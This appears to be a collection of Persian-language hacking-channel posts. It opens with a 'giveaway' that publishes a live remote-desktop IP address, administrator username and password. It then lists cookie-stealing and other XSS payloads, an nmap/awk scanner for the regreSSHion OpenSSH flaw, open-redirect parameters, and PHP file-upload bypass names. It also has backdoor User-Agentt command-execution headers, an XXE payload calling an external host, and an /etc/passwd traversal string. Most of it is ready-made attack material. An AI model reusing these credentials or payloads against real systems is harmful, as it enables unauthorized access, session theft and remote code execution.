⭕️ ‌ ‌ ‌برای استارت مسابقه فعلا یه سرور مجازی قرار بدیم، اگر حمایت شما بیشتر بدونه فاصله دوباره مسابقه میزاریم.
🎁 ‌ ‌ ‌ ‌زمان مسابقه 8 شب🎁
🎺 ‌ ‌ ‌برای برگزاری مسابقه ری‌اکشن بزارید و چنل رو برای دوستاتون بقرستید🎺

⭕️ ‌‌ ‌ ‌ری‌اکشن زیر این پست فراموش نشه!
⭕️‌ ‌ ‌ قرعه‌کشی ساعت 8 برگزار میشه.

⭕️ ‌ ‌ ‌صدای چنل رو باز کنید که رأس ساعت ۸ جایزه رو میزارم☠️

89.185.85.70:3389
administrator
parsa2002@!@!

<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>

nmap -sV -Pn -p22 -iL servers.txt | awk '/Nmap scan report/{ip=$5} /OpenSSH/ {
    if ($5 >= "8.5p1" && $5 < "9.8p1") {
        status = "Vulnerable to CVE-2024-6387"
    } else if ($5 >= "4.4p1" && $5 < "8.5p1") {
        status = "Not vulnerable to CVE-2024-6387 (patched for CVE-2006-5051)"
    } else if ($5 < "4.4p1") {
        status = "Vulnerable to regreSSHion (unless patched for CVE-2006-5051 and CVE-2008-4109)"
    }
    if (status) {
        print "Server: "ip"\t", "OpenSSH Version: "$5"\t", "Status: "status
        status = ""
    }
}'

بدون شک جاوااسکریپت جز سه زبان محبوب در کل دنیاست. آینده دار، بازار کار قوی و قدرت فوق‌العاده...

• ?dest={target}
• ?redirect={target}
• ?uri={target}
• ?path={target}
• ?continue={target}
• ?url={target}
• ?window={target}
• ?next={target}
• ?data={target}
• ?reference={target}
• ?site={target}
• ?html={target}
• ?val={target}
• ?validate={target}
• ?domain={target}
• ?callback={target}
• ?return={target}
• ?page={target}
• ?feed={target}
• ?host={target}
• ?port={target}
• ?to={target}
• ?out={target}
• ?view={target}
• ?dir={target}

→ .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp → .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
Using random capitalization → .pHp, .pHP5, .PhAr

file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg

ابزار nikto برای اسکن وب سرورها و یافتن آسیب پذیری در برنامه های تحت وب است. این ابزار توانایی تجزیه و تحلیل سرورهای وب برای آسیب پذیری های شناخته شده، دایرکتوری های مخفی، فایل ها و سایر آبجکت های  خطرناک را فراهم می کند.
— این ابزار به طور فعال توسط جامعه امنیت اطلاعات توسعه یافته و برای اطمینان از کارایی بالا در تشخیص آسیب پذیری ها به روز شده است. ابزار nikto به دلیل انعطاف پذیری و طیف گسترده ای از ویژگی ها، یکی از محبوب ترین ابزارها برای ممیزی امنیت برنامه های وب است.

User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

<details open ontoggle="(()=>alertibrahimxss)()"></details>

"target/lib/css/animated.min.css"

"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"